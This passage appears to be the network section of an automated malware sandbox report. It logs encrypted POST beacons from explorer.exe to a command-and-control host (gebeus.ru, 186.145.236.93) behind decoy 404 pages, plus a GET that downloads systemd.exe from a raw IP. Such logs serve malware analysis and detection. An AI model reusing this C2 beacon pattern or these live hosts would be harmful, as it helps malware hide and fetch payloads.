                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          5192.168.2.549715186.145.236.93801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 19, 2024 13:43:34.350730896 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://bfhspraqocnicu.com/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 145
                                                          Host: gebeus.ru
                                                          Jul 19, 2024 13:43:34.350815058 CEST145OUTData Raw: 3b 6e 54 64 87 c8 6c 52 ab de c2 07 03 00 79 cb 0a 08 cb e5 68 05 91 64 79 7a 7d 92 32 cb b2 62 e8 5d c1 2b 73 6e 23 69 9d e9 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 38 25 e1 ed
                                                          Data Ascii: ;nTdlRyhdyz}2b]+sn#i?#1|J7 M@NA -[k,vu8%}v{Pckg^CQR4p+2UAa'!Z#
                                                          Jul 19, 2024 13:43:35.411072969 CEST484INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Fri, 19 Jul 2024 11:43:35 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          6192.168.2.549716186.145.236.93801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 19, 2024 13:43:35.421758890 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://ovmeaseeesddavq.com/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 232
                                                          Host: gebeus.ru
                                                          Jul 19, 2024 13:43:35.421785116 CEST232OUTData Raw: 3b 6e 54 64 87 c8 6c 52 ab de c2 07 03 00 79 cb 0a 08 cb e5 68 05 91 64 79 7a 7d 92 32 cb b2 62 e8 5d c1 2b 73 6e 23 69 9d e9 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 54 39 b0 aa
                                                          Data Ascii: ;nTdlRyhdyz}2b]+sn#i?#1|J7 M@NA -[k,vuT9K@Q|XY8Hgk aK=xR&Dk}Lkwfl<C$/ /vEr0aV]w(Ri
                                                          Jul 19, 2024 13:43:36.485419989 CEST484INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Fri, 19 Jul 2024 11:43:36 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          7192.168.2.549717186.145.236.93801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 19, 2024 13:43:36.495165110 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://hgoopfcuaxxcsy.org/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 279
                                                          Host: gebeus.ru
                                                          Jul 19, 2024 13:43:36.495165110 CEST279OUTData Raw: 3b 6e 54 64 87 c8 6c 52 ab de c2 07 03 00 79 cb 0a 08 cb e5 68 05 91 64 79 7a 7d 92 32 cb b2 62 e8 5d c1 2b 73 6e 23 69 9d e9 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 50 25 d9 fe
                                                          Data Ascii: ;nTdlRyhdyz}2b]+sn#i?#1|J7 M@NA -[k,vuP%<l"X8p*aZ_,92?Z3(s$1}CC@s:\"c)\!Hmbqy8+h:R~YI4h
                                                          Jul 19, 2024 13:43:37.540466070 CEST484INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Fri, 19 Jul 2024 11:43:37 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          8192.168.2.549718186.145.236.93801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 19, 2024 13:43:37.872246027 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://obswclybvegixrj.com/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 195
                                                          Host: gebeus.ru
                                                          Jul 19, 2024 13:43:37.872246027 CEST195OUTData Raw: 3b 6e 54 64 87 c8 6c 52 ab de c2 07 03 00 79 cb 0a 08 cb e5 68 05 91 64 79 7a 7d 92 32 cb b2 62 e8 5d c1 2b 73 6e 23 69 9d e9 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 79 49 b7 e3
                                                          Data Ascii: ;nTdlRyhdyz}2b]+sn#i?#1|J7 M@NA -[k,vuyIN}E~kZ\a;5ndiscj3]u[@9t{%-=`YPNVs~F*
                                                          Jul 19, 2024 13:43:38.940354109 CEST189INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Fri, 19 Jul 2024 11:43:38 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2e 5c 24 14 a6 69 44 aa ad 10 bd cf b4 f9 6d 87 37 c6 ec 26 57 11 c2 8f 97 cb
                                                          Data Ascii: #\.\$iDm7&W


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          9192.168.2.54971977.221.157.163801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 19, 2024 13:43:38.948146105 CEST163OUTGET /systemd.exe HTTP/1.1
                                                          Connection: Keep-Alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Host: 77.221.157.163


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          10192.168.2.557783186.145.236.93801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 19, 2024 13:44:00.330643892 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://dxxpyoqdjpxpiu.org/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 305
                                                          Host: gebeus.ru
                                                          Jul 19, 2024 13:44:00.330682993 CEST305OUTData Raw: 3b 6e 54 64 87 c8 6c 52 ab de c2 07 03 00 79 cb 0a 08 cb e5 68 05 91 64 79 7a 7d 92 32 cb b2 62 e8 5d c1 2b 73 6e 23 69 9d e9 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 56 19 c3 bd
                                                          Data Ascii: ;nTdlRyhdyz}2b]+sn#i?#1|J7 M@NA -[k,vuVv4~UKHI9m/Io!S+<N-WP:pBvwXe&`RQ}I]X6.~0WBVVA;,Ad
                                                          Jul 19, 2024 13:44:01.395323038 CEST484INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Fri, 19 Jul 2024 11:44:01 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          11192.168.2.557784186.145.236.93801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 19, 2024 13:44:01.411735058 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://iokxfgvwlwvbn.org/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 229
                                                          Host: gebeus.ru
                                                          Jul 19, 2024 13:44:01.411772966 CEST229OUTData Raw: 3b 6e 54 64 87 c8 6c 52 ab de c2 07 03 00 79 cb 0a 08 cb e5 68 05 91 64 79 7a 7d 92 32 cb b2 62 e8 5d c1 2b 73 6e 23 69 9d e9 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 67 3f dd 82
                                                          Data Ascii: ;nTdlRyhdyz}2b]+sn#i?#1|J7 M@NA -[k,vug?;AopVjJ(iNW1*VK"x--w9x@\MPpPEp!0O_3/
                                                          Jul 19, 2024 13:44:02.645494938 CEST137INHTTP/1.1 200 OK
                                                          Server: nginx/1.26.0
                                                          Date: Fri, 19 Jul 2024 11:44:02 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          12192.168.2.557785186.145.236.93801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 19, 2024 13:44:02.653528929 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://tdhyqfiiuytxgxp.net/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 278
                                                          Host: gebeus.ru
                                                          Jul 19, 2024 13:44:02.653541088 CEST278OUTData Raw: 3b 6e 54 64 87 c8 6c 52 ab de c2 07 03 00 79 cb 0a 08 cb e5 68 05 91 64 79 7a 7d 92 32 cb b2 62 e8 5d c1 2b 73 6e 23 69 9d e9 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 73 3c df a1
                                                          Data Ascii: ;nTdlRyhdyz}2b]+sn#i?#1|J7 M@NA -[k,vus<P@{cM 6R~ol,B;0shV^Z;R<JO,o<:%7r%,8K]L0`cP2Ws_3Ri@'ar@?%"'
                                                          Jul 19, 2024 13:44:03.775811911 CEST484INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Fri, 19 Jul 2024 11:44:03 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          13192.168.2.557786186.145.236.93801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 19, 2024 13:44:03.783977985 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://pojiqquohhri.net/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 207
                                                          Host: gebeus.ru
                                                          Jul 19, 2024 13:44:03.783996105 CEST207OUTData Raw: 3b 6e 54 64 87 c8 6c 52 ab de c2 07 03 00 79 cb 0a 08 cb e5 68 05 91 64 79 7a 7d 92 32 cb b2 62 e8 5d c1 2b 73 6e 23 69 9d e9 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 63 26 eb fa
                                                          Data Ascii: ;nTdlRyhdyz}2b]+sn#i?#1|J7 M@NA -[k,vuc&>[RFq3`A1?m?.\Y_B\OYVTu:FlO?< r.fl`!0>K
                                                          Jul 19, 2024 13:44:04.820034027 CEST484INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Fri, 19 Jul 2024 11:44:04 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          14192.168.2.557787186.145.236.93801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 19, 2024 13:44:04.828936100 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://vowgfyyfrgsdo.org/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 290
                                                          Host: gebeus.ru
                                                          Jul 19, 2024 13:44:04.828963041 CEST290OUTData Raw: 3b 6e 54 64 87 c8 6c 52 ab de c2 07 03 00 79 cb 0a 08 cb e5 68 05 91 64 79 7a 7d 92 32 cb b2 62 e8 5d c1 2b 73 6e 23 69 9d e9 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 3d 05 ea 93
                                                          Data Ascii: ;nTdlRyhdyz}2b]+sn#i?#1|J7 M@NA -[k,vu=U5]_d(9.`4p_gOCWWAHPP M=%I_WSJHTZ5EH!neeG)Nuqb#"&
                                                          Jul 19, 2024 13:44:05.884707928 CEST484INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Fri, 19 Jul 2024 11:44:05 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


